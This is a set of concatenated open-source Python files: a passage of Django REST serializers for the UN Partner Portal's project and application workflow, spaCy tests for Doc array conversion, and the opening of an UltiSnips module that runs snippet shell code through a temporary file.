validated_data['cn_template'] = validated_data['agency'].profile.eoi_template
validated_data['created_by'] = self.context['request'].user
self.instance = EOI.objects.create(**validated_data)
for location in locations:
point = Point.objects.get_point(**location)
self.instance.locations.add(point)
for specialization in specializations:
self.instance.specializations.add(specialization)
for focal_point in focal_points:
self.instance.focal_points.add(focal_point)
for attachment_data in attachments:
attachment_data['eoi'] = self.instance
EOIAttachment.objects.create(**attachment_data)
send_notification_to_cfei_focal_points(self.instance)
return self.instance
class SelectedPartnersSerializer(serializers.ModelSerializer):
partner_id = serializers.CharField(source="partner.id")
partner_name = serializers.CharField(source="partner.legal_name")
partner_is_verified = serializers.NullBooleanField(source="partner.is_verified")
application_status_display = serializers.CharField(read_only=True)
partner_profile_is_complete = serializers.BooleanField(read_only=True, source='partner.profile_is_complete')
class Meta:
model = Application
fields = (
'id',
'partner_id',
'partner_name',
'partner_is_verified',
'partner_profile_is_complete',
'application_status',
'application_status_display',
)
class SelectedPartnersJustificationSerializer(SelectedPartnersSerializer):
ds_attachment = CommonFileSerializer(read_only=True)
class Meta(SelectedPartnersSerializer.Meta):
fields = SelectedPartnersSerializer.Meta.fields + (
'ds_justification_select',
'justification_reason',
'ds_attachment',
)
class PartnerProjectSerializer(serializers.ModelSerializer):
agency = serializers.CharField(source='agency.name')
specializations = SimpleSpecializationSerializer(many=True)
locations = PointSerializer(many=True)
is_pinned = serializers.SerializerMethodField()
application = serializers.SerializerMethodField()
attachments = EOIAttachmentSerializer(many=True, read_only=True)
# TODO - cut down on some of these fields. partners should not get back this data
# Frontend currently breaks if doesn't receive all
class Meta:
model = EOI
fields = (
'id',
'displayID',
'specializations',
'locations',
'assessments_criteria',
'created',
'start_date',
'end_date',
'clarification_request_deadline_date',
'deadline_date',
'notif_results_date',
'justification',
'completed_reason',
'completed_date',
'is_completed',
'display_type',
'status',
'title',
'agency',
'agency_office',
'cn_template',
'description',
'goal',
'other_information',
'has_weighting',
'selected_source',
'is_pinned',
'application',
'published_timestamp',
'deadline_passed',
'clarification_request_deadline_passed',
'attachments',
'population',
)
read_only_fields = fields
def get_is_pinned(self, obj):
return obj.pins.filter(partner=self.context['request'].active_partner.id).exists()
def get_application(self, obj):
qs = obj.applications.filter(partner=self.context['request'].active_partner.id)
if qs.exists():
return ApplicationPartnerSerializer(qs.get()).data
return None
class AgencyProjectSerializer(serializers.ModelSerializer):
specializations = SimpleSpecializationSerializer(many=True, read_only=True)
locations = PointSerializer(many=True, read_only=True)
direct_selected_partners = serializers.SerializerMethodField()
focal_points_detail = BasicUserSerializer(source='focal_points', read_only=True, many=True)
reviewers_detail = BasicUserSerializer(source='reviewers', read_only=True, many=True)
invited_partners = PartnerShortSerializer(many=True, read_only=True)
applications_count = serializers.SerializerMethodField(allow_null=True, read_only=True)
attachments = EOIAttachmentSerializer(many=True, read_only=True)
current_user_finished_reviews = serializers.SerializerMethodField(allow_null=True, read_only=True)
current_user_marked_reviews_completed = serializers.SerializerMethodField(allow_null=True, read_only=True)
winning_partners = PartnerSimpleSerializer(many=True, allow_null=True)
class Meta:
model = EOI
fields = (
'id',
'displayID',
'specializations',
'invited_partners',
'locations',
'assessments_criteria',
'created',
'start_date',
'end_date',
'clarification_request_deadline_date',
'deadline_date',
'notif_results_date',
'justification',
'completed_reason',
'completed_reason_display',
'completed_retention',
'completed_comment',
'completed_date',
'is_completed',
'display_type',
'status',
'title',
'agency',
'created_by',
'focal_points',
'focal_points_detail',
'agency_office',
'cn_template',
'description',
'goal',
'other_information',
'has_weighting',
'reviewers',
'reviewers_detail',
'selected_source',
'direct_selected_partners',
'created',
'contains_partner_accepted',
'applications_count',
'is_published',
'deadline_passed',
'clarification_request_deadline_passed',
'published_timestamp',
'attachments',
'sent_for_decision',
'current_user_finished_reviews',
'current_user_marked_reviews_completed',
'assessments_marked_as_completed',
'contains_recommended_applications',
'winning_partners',
'population',
)
read_only_fields = (
'created',
'completed_date',
'is_published',
'published_timestamp',
'displayID',
'sent_for_decision',
)
def get_extra_kwargs(self):
extra_kwargs = super(AgencyProjectSerializer, self).get_extra_kwargs()
if self.instance and isinstance(self.instance, EOI):
if not self.instance.is_direct:
completed_reason_choices = COMPLETED_REASON
elif self.instance.agency.name == UNHCR.name:
completed_reason_choices = UNHCR_DSR_COMPLETED_REASONS
else:
completed_reason_choices = OTHER_AGENCIES_DSR_COMPLETED_REASONS
extra_kwargs['completed_reason'] = {
'choices': completed_reason_choices
}
return extra_kwargs
def get_direct_selected_partners(self, obj):
if obj.is_direct:
request = self.context.get('request')
if obj.is_completed or request and request.agency_member.office.agency == obj.agency:
serializer_class = SelectedPartnersJustificationSerializer
else:
serializer_class = SelectedPartnersSerializer
return serializer_class(obj.applications.all(), many=True).data
def get_applications_count(self, eoi):
return eoi.applications.count()
def get_current_user_finished_reviews(self, eoi):
request = self.context.get('request')
user = request and request.user
if user and eoi.reviewers.filter(id=user.id).exists():
applications = eoi.applications.filter(status=APPLICATION_STATUSES.preselected)
return applications.count() == user.assessments.filter(application__in=applications).count()
def get_current_user_marked_reviews_completed(self, eoi):
request = self.context.get('request')
user = request and request.user
if user and eoi.reviewers.filter(id=user.id).exists():
applications = eoi.applications.filter(status=APPLICATION_STATUSES.preselected)
return applications.count() == user.assessments.filter(application__in=applications, completed=True).count()
@transaction.atomic
def update(self, eoi: EOI, validated_data):
if eoi.status == CFEI_STATUSES.closed and not set(validated_data.keys()).issubset(
{'reviewers', 'focal_points', 'completed_reason', 'justification'}
):
raise serializers.ValidationError(
"Since CFEI deadline is passed, You can only modify reviewer(s) and/or focal point(s)."
)
completed_reason = validated_data.get('completed_reason')
if completed_reason:
if not validated_data.get('justification'):
raise serializers.ValidationError({
'justification': 'This field is required'
})
if completed_reason == ALL_COMPLETED_REASONS.accepted_retention and not validated_data.get(
'completed_retention'
):
raise serializers.ValidationError({
'completed_retention': 'This field is required'
})
if completed_reason in {
COMPLETED_REASON.partners,
ALL_COMPLETED_REASONS.accepted,
ALL_COMPLETED_REASONS.accepted_retention,
} and not eoi.contains_partner_accepted:
raise serializers.ValidationError({
'completed_reason': f"You've selected '{ALL_COMPLETED_REASONS[completed_reason]}' as "
f"finalize resolution, but no partners have accepted."
})
has_just_been_completed = all([
eoi.completed_reason is None,
validated_data.get('completed_reason'),
eoi.completed_date is None,
eoi.is_completed is False
])
if has_just_been_completed:
eoi.completed_date = datetime.now()
eoi.is_completed = True
eoi = super(AgencyProjectSerializer, self).update(eoi, validated_data)
invited_partners = self.initial_data.get('invited_partners', [])
if invited_partners:
invited_partner_ids = [p['id'] for p in invited_partners]
eoi.invited_partners.through.objects.filter(eoi_id=eoi.id).exclude(
partner_id__in=invited_partner_ids
).delete()
eoi.invited_partners.add(*Partner.objects.filter(id__in=invited_partner_ids))
elif 'invited_partners' in self.initial_data:
eoi.invited_partners.clear()
specialization_ids = self.initial_data.get('specializations', [])
if specialization_ids:
eoi.specializations.through.objects.filter(eoi_id=eoi.id).exclude(
specialization_id__in=specialization_ids
).delete()
eoi.specializations.add(*Specialization.objects.filter(id__in=specialization_ids))
locations_data = self.initial_data.get('locations', [])
if locations_data:
eoi.locations.clear()
for location_data in locations_data:
location_serializer = PointSerializer(data=location_data)
location_serializer.is_valid(raise_exception=True)
eoi.locations.add(location_serializer.save())
update_cfei_reviewers(eoi, self.initial_data.get('reviewers'))
update_cfei_focal_points(eoi, self.initial_data.get('focal_points'))
update_m2m_relation(
eoi,
'attachments',
self.initial_data.get('attachments'),
EOIAttachmentSerializer,
context=self.context,
save_kwargs={
'eoi': eoi
}
)
if eoi.is_direct and self.initial_data.get('applications'):
# DSRs should only have 1 application
application_data = self.initial_data.get('applications')[0]
serializer = CreateDirectApplicationNoCNSerializer(
instance=eoi.applications.first(),
data=application_data,
partial=True
)
serializer.is_valid(raise_exception=True)
serializer.save()
return eoi
def validate(self, data):
assessments_criteria = data.get('assessments_criteria', [])
has_weighting = data.get('has_weighting', False)
if has_weighting is True and all(map(lambda x: 'weight' in x, assessments_criteria)) is False:
raise serializers.ValidationError(
"Weight criteria must be provided since `has_weighting` is selected."
)
elif has_weighting is False and any(map(lambda x: 'weight' in x, assessments_criteria)) is True:
raise serializers.ValidationError(
"Weight criteria should not be provided since `has_weighting` is unselected."
)
return super(AgencyProjectSerializer, self).validate(data)
class SimpleAssessmentSerializer(serializers.ModelSerializer):
reviewer_fullname = serializers.CharField(source='reviewer.fullname')
total_score = serializers.IntegerField()
class Meta:
model = Assessment
fields = (
'reviewer_fullname',
'note',
'total_score',
)
read_only_fields = fields
class ApplicationsListSerializer(serializers.ModelSerializer):
legal_name = serializers.CharField(source="partner.legal_name")
partner_additional = PartnerAdditionalSerializer(source="partner", read_only=True)
type_org = serializers.CharField(source="partner.display_type")
cn = CommonFileSerializer()
your_score = serializers.SerializerMethodField()
your_score_breakdown = serializers.SerializerMethodField()
review_progress = serializers.SerializerMethodField()
assessments_completed = serializers.SerializerMethodField()
application_status_display = serializers.CharField(read_only=True)
assessments = SimpleAssessmentSerializer(many=True, read_only=True)
completed_assessments_count = serializers.SerializerMethodField()
average_scores = serializers.SerializerMethodField()
class Meta:
model = Application
fields = (
'id',
'legal_name',
'partner_additional',
'type_org',
'status',
'cn',
'average_total_score',
'your_score',
'your_score_breakdown',
'review_progress',
'application_status_display',
'assessments',
'completed_assessments_count',
'average_scores',
'did_accept',
'did_decline',
'did_win',
'did_withdraw',
'assessments_completed',
)
def _get_review_reviewers_count(self, app):
return app.assessments.count(), app.eoi.reviewers.count()
def _get_my_assessment(self, obj):
assess_qs = obj.assessments.filter(reviewer=self.context['request'].user)
if assess_qs.exists():
return assess_qs.first()
return None
def get_your_score(self, obj):
my_assessment = self._get_my_assessment(obj)
return my_assessment.total_score if my_assessment else None
def get_your_score_breakdown(self, obj):
my_assessment = self._get_my_assessment(obj)
return my_assessment.get_scores_as_dict() if my_assessment else None
def get_review_progress(self, obj):
return '{}/{}'.format(*self._get_review_reviewers_count(obj))
def get_assessments_completed(self, obj):
return obj.eoi.reviewers.count() == self.get_completed_assessments_count(obj)
def get_completed_assessments_count(self, obj):
return obj.assessments.filter(completed=True).count()
def get_average_scores(self, obj):
scores = defaultdict(int)
total = 0
for assessment in obj.assessments.filter(completed=True):
for score in assessment.scores:
scores[score['selection_criteria']] += score['score']
total += 1
if not total:
return {}
return {
k: v / total for k, v in scores.items()
}
class ReviewersApplicationSerializer(serializers.ModelSerializer):
assessment = serializers.SerializerMethodField(read_only=True)
class Meta:
model = User
fields = (
'id',
'fullname',
'assessment',
)
def get_assessment(self, obj):
application_id = self.context['request'].parser_context['kwargs']['application_id']
assessment = Assessment.objects.filter(application=application_id, reviewer=obj)
return ReviewerAssessmentsSerializer(assessment, many=True).data
class ReviewerAssessmentsSerializer(serializers.ModelSerializer):
total_score = serializers.IntegerField(read_only=True)
reviewer = serializers.HiddenField(default=serializers.CreateOnlyDefault(CurrentUserDefault()))
created_by = serializers.HiddenField(default=serializers.CreateOnlyDefault(CurrentUserDefault()))
modified_by = serializers.HiddenField(default=serializers.CreateOnlyDefault(CurrentUserDefault()))
class Meta:
model = Assessment
fields = (
'id',
'reviewer',
'created_by',
'modified_by',
'application',
'scores',
'total_score',
'date_reviewed',
'is_a_committee_score',
'note',
'completed',
'completed_date',
)
read_only_fields = (
'created_by', 'modified_by', 'completed', 'completed_date',
)
def get_extra_kwargs(self):
extra_kwargs = super(ReviewerAssessmentsSerializer, self).get_extra_kwargs()
if self.instance:
extra_kwargs['application'] = {
'read_only': True
}
return extra_kwargs
def validate(self, data):
kwargs = self.context['request'].parser_context.get('kwargs', {})
application_id = kwargs.get(self.context['view'].application_url_kwarg)
app = get_object_or_404(Application.objects.select_related('eoi'), pk=application_id)
if app.eoi.status != CFEI_STATUSES.closed:
raise serializers.ValidationError("Assessment allowed once deadline is passed.")
if data.get('is_a_committee_score', False) and app.eoi.reviewers.count() > 1:
raise serializers.ValidationError({
'is_a_committee_score': 'Committee scores are only allowed on projects with one reviewer.'
})
scores = data.get('scores')
application = self.instance and self.instance.application or app
assessments_criteria = application.eoi.assessments_criteria
if scores and not {s['selection_criteria'] for s in scores} == {
ac['selection_criteria'] for ac in assessments_criteria
}:
raise serializers.ValidationError("You can score only selection criteria defined in CFEI.")
if scores and application.eoi.has_weighting:
for score in scores:
key = score.get('selection_criteria')
val = score.get('score')
criterion = list(filter(lambda x: x.get('selection_criteria') == key, assessments_criteria))
if len(criterion) == 1 and val > criterion[0].get('weight'):
raise serializers.ValidationError("The maximum score is equal to the value entered for the weight.")
elif len(criterion) != 1:
raise serializers.ValidationError("Selection criterion '{}' defined improper.".format(key))
return super(ReviewerAssessmentsSerializer, self).validate(data)
class ApplicationPartnerOpenSerializer(serializers.ModelSerializer):
project_title = serializers.CharField(source="eoi.title")
project_displayID = serializers.CharField(source="eoi.displayID")
agency_name = serializers.CharField(source="agency.name")
country = serializers.SerializerMethodField()
specializations = serializers.SerializerMethodField()
application_date = serializers.CharField(source="created")
application_status_display = serializers.CharField(read_only=True)
class Meta:
model = Application
fields = (
'id',
'project_title',
'project_displayID',
'eoi_id',
'agency_name',
'country',
'specializations',
'application_date',
'application_status',
'application_status_display',
)
def get_country(self, obj):
return get_countries_code_from_queryset(obj.eoi.locations)
def get_specializations(self, obj):
return SimpleSpecializationSerializer(obj.eoi.specializations.all(), many=True).data
class ApplicationPartnerUnsolicitedDirectSerializer(serializers.ModelSerializer):
project_title = serializers.SerializerMethodField()
agency_name = serializers.CharField(source="agency.name")
country = serializers.SerializerMethodField()
specializations = serializers.SerializerMethodField()
submission_date = serializers.DateTimeField(source="published_timestamp")
is_direct = serializers.SerializerMethodField()
partner_name = serializers.CharField(source="partner.legal_name")
partner_additional = PartnerAdditionalSerializer(source="partner", read_only=True)
selected_source = serializers.CharField(source="eoi.selected_source", allow_null=True)
application_status_display = serializers.CharField(read_only=True)
class Meta:
model = Application
fields = (
'id',
'project_title',
'selected_source',
'eoi_id',
'agency_name',
'country',
'specializations',
'submission_date',
'status',
'is_direct',
'partner_name',
'partner_additional',
'application_status',
'application_status_display',
)
def get_project_title(self, obj):
return obj.proposal_of_eoi_details.get('title')
def get_country(self, obj):
if obj.eoi:
# has been updated to direct selected
country = obj.eoi.locations
else:
country = obj.locations_proposal_of_eoi
if country:
# we expecting here few countries
return get_countries_code_from_queryset(country)
return None
# TODO - need to make field names between here and application details the same
# application details uses nested under proposal_of_eoi_details
def get_specializations(self, obj):
return SimpleSpecializationSerializer(
Specialization.objects.filter(id__in=obj.proposal_of_eoi_details.get('specializations')), many=True).data
def get_is_direct(self, obj):
return obj.eoi_converted is not None
class ApplicationPartnerDirectSerializer(ApplicationPartnerUnsolicitedDirectSerializer):
project_title = serializers.CharField(source="eoi.title")
specializations = serializers.SerializerMethodField()
def get_specializations(self, obj):
return SimpleSpecializationSerializer(obj.eoi.specializations.all(), many=True).data
class AgencyUnsolicitedApplicationSerializer(ApplicationPartnerUnsolicitedDirectSerializer):
has_yellow_flag = serializers.BooleanField(source="partner.has_yellow_flag")
has_red_flag = serializers.BooleanField(source="partner.has_red_flag")
is_ds_converted = serializers.SerializerMethodField()
class Meta:
model = Application
fields = ApplicationPartnerUnsolicitedDirectSerializer.Meta.fields + (
'has_red_flag',
'has_yellow_flag',
'partner_is_verified',
'is_ds_converted',
)
def get_is_ds_converted(self, obj):
return obj.eoi_converted is not None
class ApplicationFeedbackSerializer(serializers.ModelSerializer):
provider = AgencyUserListSerializer(read_only=True)
class Meta:
model = ApplicationFeedback
fields = ('id', 'feedback', 'provider', 'created')
class ConvertUnsolicitedSerializer(serializers.Serializer):
RESTRICTION_MSG = 'Unsolicited concept note already converted to a direct selection project.'
ds_justification_select = serializers.ListField()
justification = serializers.CharField(source="eoi.justification")
focal_points = IDUserSerializer(many=True, source="eoi.focal_points", read_only=True)
description = serializers.CharField(source="eoi.description")
other_information = serializers.CharField(
source="eoi.other_information", required=False, allow_blank=True, allow_null=True)
start_date = serializers.DateField(source="eoi.start_date")
end_date = serializers.DateField(source="eoi.end_date")
class Meta:
model = Application
def validate(self, data):
id = self.context['request'].parser_context.get('kwargs', {}).get('pk')
if Application.objects.get(id=id).eoi_converted is not None:
raise serializers.ValidationError(self.RESTRICTION_MSG)
return super(ConvertUnsolicitedSerializer, self).validate(data)
@transaction.atomic
def create(self, validated_data):
ds_justification_select = validated_data.pop('ds_justification_select')
focal_points = self.initial_data.get('focal_points', [])
submitter = self.context['request'].user
app_id = self.context['request'].parser_context['kwargs']['pk']
application: Application = get_object_or_404(
Application,
id=app_id,
is_unsolicited=True,
eoi_converted__isnull=True
)
if not application.locations_proposal_of_eoi.first():
raise serializers.ValidationError('Invalid application, no locations specified.')
eoi: EOI = EOI(**validated_data['eoi'])
eoi.displayID = get_eoi_display_identifier(
application.agency.name, application.locations_proposal_of_eoi.first().admin_level_1.country_code
)
eoi.created_by = submitter
eoi.display_type = CFEI_TYPES.direct
eoi.title = application.proposal_of_eoi_details.get('title')
eoi.agency = application.agency
# we can use get direct because agent have one agency office
eoi.agency_office = submitter.agency_members.get().office
eoi.selected_source = DIRECT_SELECTION_SOURCE.ucn
eoi.is_published = True
eoi.save()
for specialization in application.proposal_of_eoi_details.get('specializations', []):
eoi.specializations.add(specialization)
for location in application.locations_proposal_of_eoi.all():
eoi.locations.add(location)
application.ds_justification_select = ds_justification_select
application.eoi_converted = eoi
application.save()
ds_app = Application.objects.create(
partner=application.partner,
eoi=eoi,
agency=eoi.agency,
submitter=application.submitter,
status=APPLICATION_STATUSES.pending,
did_win=True,
did_accept=False,
ds_justification_select=ds_justification_select,
justification_reason=application.justification_reason
)
update_cfei_focal_points(eoi, focal_points)
return ds_app
class ReviewSummarySerializer(MixinPreventManyCommonFile, serializers.ModelSerializer):
review_summary_attachment = CommonFileSerializer(required=False, allow_null=True)
class Meta:
model = EOI
fields = (
'review_summary_comment',
'review_summary_attachment',
)
prevent_keys = ['review_summary_attachment']
def update(self, instance, validated_data):
self.prevent_many_common_file_validator(self.initial_data)
return super(ReviewSummarySerializer, self).update(instance, validated_data)
class EOIReviewersAssessmentsSerializer(serializers.ModelSerializer):
user_id = serializers.CharField(source='id')
user_name = serializers.CharField(source='get_fullname')
assessments = serializers.SerializerMethodField()
class Meta:
model = User
fields = (
'user_id',
'user_name',
'assessments',
)
def get_assessments(self, user):
lookup_field = self.context['view'].lookup_field
eoi_id = self.context['request'].parser_context['kwargs'][lookup_field]
eoi = get_object_or_404(EOI, id=eoi_id)
applications = eoi.applications.filter(status__in=[
APPLICATION_STATUSES.preselected, APPLICATION_STATUSES.recommended,
])
applications_count = applications.count()
assessments_count = Assessment.objects.filter(reviewer=user, application__in=applications).count()
reminder_sent_recently = user_received_notification_recently(user, eoi, NotificationType.CFEI_REVIEW_REQUIRED)
return {
'counts': "{}/{}".format(assessments_count, applications_count),
'send_reminder': not (applications_count == assessments_count) and not reminder_sent_recently,
'eoi_id': eoi_id, # use full for front-end to easier construct send reminder url
}
class AwardedPartnersSerializer(serializers.ModelSerializer):
partner_id = serializers.CharField(source='partner.id')
partner_name = serializers.CharField(source='partner.legal_name')
partner_additional = PartnerAdditionalSerializer(source="partner", read_only=True)
application_id = serializers.CharField(source='id')
cn = CommonFileSerializer()
partner_notified = serializers.SerializerMethodField()
agency_decision_maker = BasicUserSerializer(read_only=True)
partner_decision_maker = BasicUserSerializer(read_only=True)
body = serializers.SerializerMethodField()
class Meta:
model = Application
fields = (
'partner_id',
'partner_name',
'partner_additional',
'application_id',
'did_win',
'did_withdraw',
'withdraw_reason',
'did_decline',
'did_accept',
'cn',
'partner_notified',
'agency_decision_date',
'agency_decision_maker',
'partner_decision_date',
'partner_decision_maker',
'body',
)
def get_body(self, obj):
assessments_count = obj.assessments.count()
assessments = obj.assessments.all()
notes = []
for assessment in assessments:
notes.append({
'note': assessment.note,
'reviewer': assessment.reviewer.get_fullname(),
})
return {
'criteria': obj.get_scores_by_selection_criteria(),
'notes': notes,
'avg_total_score': obj.average_total_score,
'assessment_count': assessments_count,
}
def get_partner_notified(self, obj):
return obj.accept_notification and obj.accept_notification.created
class CompareSelectedSerializer(serializers.ModelSerializer):
partner_id = serializers.IntegerField(source='partner.id')
partner_name = serializers.CharField(source='partner.legal_name')
partner_additional = PartnerAdditionalSerializer(source="partner", read_only=True)
year_establishment = serializers.IntegerField(source='partner.profile.year_establishment')
total_assessment_score = serializers.IntegerField(source='average_total_score')
verification_status = serializers.BooleanField(source="partner.is_verified")
flagging_status = serializers.JSONField(source="partner.flagging_status")
annual_budget = serializers.SerializerMethodField()
un_exp = serializers.SerializerMethodField()
class Meta:
model = Application
fields = (
'partner_id',
'partner_name',
'partner_additional',
'year_establishment',
'eoi_id',
'total_assessment_score',
'verification_status',
'flagging_status',
'un_exp',
'annual_budget',
'verification_status',
'flagging_status',
'did_win',
'did_withdraw',
'assessments_is_completed',
'assessments_marked_as_completed',
)
def get_annual_budget(self, obj):
return obj.partner.profile.annual_budget
def get_un_exp(self, obj):
return ", ".join(obj.partner.collaborations_partnership.all().values_list('agency__name', flat=True))
class SubmittedCNSerializer(serializers.ModelSerializer):
cn_id = serializers.IntegerField(source='id')
agency_name = serializers.CharField(source="agency.name")
specializations = serializers.SerializerMethodField()
application_status_display = serializers.CharField(read_only=True)
class Meta:
model = Application
fields = (
'cn_id',
'project_title',
'cfei_type',
'agency_name',
'countries',
'specializations',
'application_status',
'application_status_display',
'eoi_id'
)
def get_specializations(self, obj):
if obj.is_unsolicited:
queryset = Specialization.objects.filter(id__in=obj.proposal_of_eoi_details.get('specializations'))
else:
queryset = obj.eoi.specializations.all()
return SimpleSpecializationSerializer(queryset, many=True).data
class PendingOffersSerializer(SubmittedCNSerializer):
class Meta:
model = Application
fields = (
'cn_id',
'project_title',
'cfei_type',
'agency_name',
'countries',
'specializations',
'eoi_id'
)
class ClarificationRequestQuestionSerializer(serializers.ModelSerializer):
created_by = BasicUserSerializer(read_only=True)
partner = PartnerSimpleSerializer(read_only=True)
class Meta:
model = ClarificationRequestQuestion
fields = (
'id',
'created',
'created_by',
'partner',
'question',
)
read_only_fields = (
'created',
)
class ClarificationRequestAnswerFileSerializer(serializers.ModelSerializer):
created_by = serializers.HiddenField(default=serializers.CreateOnlyDefault(CurrentUserDefault()))
file = CommonFileSerializer()
class Meta:
model = ClarificationRequestAnswerFile
fields = (
'id',
'created_by',
'title',
'file',
)
|
{
"content_hash": "dba5710a8e0a653784a7aae861e7cbfc",
"timestamp": "",
"source": "github",
"line_count": 1469,
"max_line_length": 120,
"avg_line_length": 37.09938733832539,
"alnum_prop": 0.6303968880162939,
"repo_name": "unicef/un-partner-portal",
"id": "7d4745a95846323772c86a0230b04427f770c7a4",
"size": "54523",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "backend/unpp_api/apps/project/serializers.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "468629"
},
{
"name": "Dockerfile",
"bytes": "2303"
},
{
"name": "HTML",
"bytes": "49027"
},
{
"name": "JavaScript",
"bytes": "2199879"
},
{
"name": "Python",
"bytes": "1322681"
},
{
"name": "Shell",
"bytes": "4734"
},
{
"name": "Smarty",
"bytes": "751"
}
],
"symlink_target": ""
}
|
import numpy
import pytest
from spacy.tokens import Doc
from spacy.attrs import ORTH, SHAPE, POS, DEP, MORPH
@pytest.mark.issue(2203)
def test_issue2203(en_vocab):
"""Test that lemmas are set correctly in doc.from_array."""
words = ["I", "'ll", "survive"]
tags = ["PRP", "MD", "VB"]
lemmas = ["-PRON-", "will", "survive"]
tag_ids = [en_vocab.strings.add(tag) for tag in tags]
lemma_ids = [en_vocab.strings.add(lemma) for lemma in lemmas]
doc = Doc(en_vocab, words=words)
# Work around lemma corruption problem and set lemmas after tags
doc.from_array("TAG", numpy.array(tag_ids, dtype="uint64"))
doc.from_array("LEMMA", numpy.array(lemma_ids, dtype="uint64"))
assert [t.tag_ for t in doc] == tags
assert [t.lemma_ for t in doc] == lemmas
# We need to serialize both tag and lemma, since this is what causes the bug
doc_array = doc.to_array(["TAG", "LEMMA"])
new_doc = Doc(doc.vocab, words=words).from_array(["TAG", "LEMMA"], doc_array)
assert [t.tag_ for t in new_doc] == tags
assert [t.lemma_ for t in new_doc] == lemmas
def test_doc_array_attr_of_token(en_vocab):
doc = Doc(en_vocab, words=["An", "example", "sentence"])
example = doc.vocab["example"]
assert example.orth != example.shape
feats_array = doc.to_array((ORTH, SHAPE))
assert feats_array[0][0] != feats_array[0][1]
assert feats_array[0][0] != feats_array[0][1]
def test_doc_stringy_array_attr_of_token(en_vocab):
doc = Doc(en_vocab, words=["An", "example", "sentence"])
example = doc.vocab["example"]
assert example.orth != example.shape
feats_array = doc.to_array((ORTH, SHAPE))
feats_array_stringy = doc.to_array(("ORTH", "SHAPE"))
assert feats_array_stringy[0][0] == feats_array[0][0]
assert feats_array_stringy[0][1] == feats_array[0][1]
def test_doc_scalar_attr_of_token(en_vocab):
doc = Doc(en_vocab, words=["An", "example", "sentence"])
example = doc.vocab["example"]
assert example.orth != example.shape
feats_array = doc.to_array(ORTH)
assert feats_array.shape == (3,)
def test_doc_array_tag(en_vocab):
words = ["A", "nice", "sentence", "."]
pos = ["DET", "ADJ", "NOUN", "PUNCT"]
doc = Doc(en_vocab, words=words, pos=pos)
assert doc[0].pos != doc[1].pos != doc[2].pos != doc[3].pos
feats_array = doc.to_array((ORTH, POS))
assert feats_array[0][1] == doc[0].pos
assert feats_array[1][1] == doc[1].pos
assert feats_array[2][1] == doc[2].pos
assert feats_array[3][1] == doc[3].pos
def test_doc_array_morph(en_vocab):
words = ["Eat", "blue", "ham"]
morph = ["Feat=V", "Feat=J", "Feat=N"]
doc = Doc(en_vocab, words=words, morphs=morph)
assert morph[0] == str(doc[0].morph)
assert morph[1] == str(doc[1].morph)
assert morph[2] == str(doc[2].morph)
feats_array = doc.to_array((ORTH, MORPH))
assert feats_array[0][1] == doc[0].morph.key
assert feats_array[1][1] == doc[1].morph.key
assert feats_array[2][1] == doc[2].morph.key
def test_doc_array_dep(en_vocab):
words = ["A", "nice", "sentence", "."]
deps = ["det", "amod", "ROOT", "punct"]
doc = Doc(en_vocab, words=words, deps=deps)
feats_array = doc.to_array((ORTH, DEP))
assert feats_array[0][1] == doc[0].dep
assert feats_array[1][1] == doc[1].dep
assert feats_array[2][1] == doc[2].dep
assert feats_array[3][1] == doc[3].dep
@pytest.mark.parametrize("attrs", [["ORTH", "SHAPE"], "IS_ALPHA"])
def test_doc_array_to_from_string_attrs(en_vocab, attrs):
"""Test that both Doc.to_array and Doc.from_array accept string attrs,
as well as single attrs and sequences of attrs.
"""
words = ["An", "example", "sentence"]
doc = Doc(en_vocab, words=words)
Doc(en_vocab, words=words).from_array(attrs, doc.to_array(attrs))
def test_doc_array_idx(en_vocab):
"""Test that Doc.to_array can retrieve token start indices"""
words = ["An", "example", "sentence"]
offsets = Doc(en_vocab, words=words).to_array("IDX")
assert offsets[0] == 0
assert offsets[1] == 3
assert offsets[2] == 11
def test_doc_from_array_heads_in_bounds(en_vocab):
"""Test that Doc.from_array doesn't set heads that are out of bounds."""
words = ["This", "is", "a", "sentence", "."]
doc = Doc(en_vocab, words=words)
for token in doc:
token.head = doc[0]
# correct
arr = doc.to_array(["HEAD"])
doc_from_array = Doc(en_vocab, words=words)
doc_from_array.from_array(["HEAD"], arr)
# head before start
arr = doc.to_array(["HEAD"])
arr[0] = -1
doc_from_array = Doc(en_vocab, words=words)
with pytest.raises(ValueError):
doc_from_array.from_array(["HEAD"], arr)
# head after end
arr = doc.to_array(["HEAD"])
arr[0] = 5
doc_from_array = Doc(en_vocab, words=words)
with pytest.raises(ValueError):
doc_from_array.from_array(["HEAD"], arr)
|
{
"content_hash": "cfbe52f8bdec037047f88f9b7815b43a",
"timestamp": "",
"source": "github",
"line_count": 136,
"max_line_length": 81,
"avg_line_length": 36.1764705882353,
"alnum_prop": 0.6184959349593496,
"repo_name": "explosion/spaCy",
"id": "c334cc6ebc41999735550b7250b1399f80407295",
"size": "4920",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "spacy/tests/doc/test_array.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "9571"
},
{
"name": "C++",
"bytes": "187"
},
{
"name": "Cython",
"bytes": "784034"
},
{
"name": "Dockerfile",
"bytes": "432"
},
{
"name": "HTML",
"bytes": "29880"
},
{
"name": "JavaScript",
"bytes": "240056"
},
{
"name": "Jinja",
"bytes": "12977"
},
{
"name": "Makefile",
"bytes": "1576"
},
{
"name": "Python",
"bytes": "3783857"
},
{
"name": "Sass",
"bytes": "56930"
},
{
"name": "Shell",
"bytes": "984"
}
],
"symlink_target": ""
}
|
"""Implements `echo hi` shell code interpolation."""
import os
import platform
from subprocess import Popen, PIPE
import stat
import tempfile
from UltiSnips.compatibility import as_unicode
from UltiSnips.text_objects._base import NoneditableTextObject
def _chomp(string):
"""Rather than rstrip(), remove only the last newline and preserve
purposeful whitespace."""
if len(string) and string[-1] == '\n':
string = string[:-1]
if len(string) and string[-1] == '\r':
string = string[:-1]
return string
def _run_shell_command(cmd, tmpdir):
"""Write the code to a temporary file"""
cmdsuf = ''
if platform.system() == 'Windows':
# suffix required to run command on windows
cmdsuf = '.bat'
# turn echo off
cmd = '@echo off\r\n' + cmd
handle, path = tempfile.mkstemp(text=True, dir=tmpdir, suffix=cmdsuf)
os.write(handle, cmd.encode("utf-8"))
os.close(handle)
os.chmod(path, stat.S_IRWXU)
# Execute the file and read stdout
proc = Popen(path, shell=True, stdout=PIPE, stderr=PIPE)
proc.wait()
stdout, _ = proc.communicate()
os.unlink(path)
return _chomp(as_unicode(stdout))
def _get_tmp():
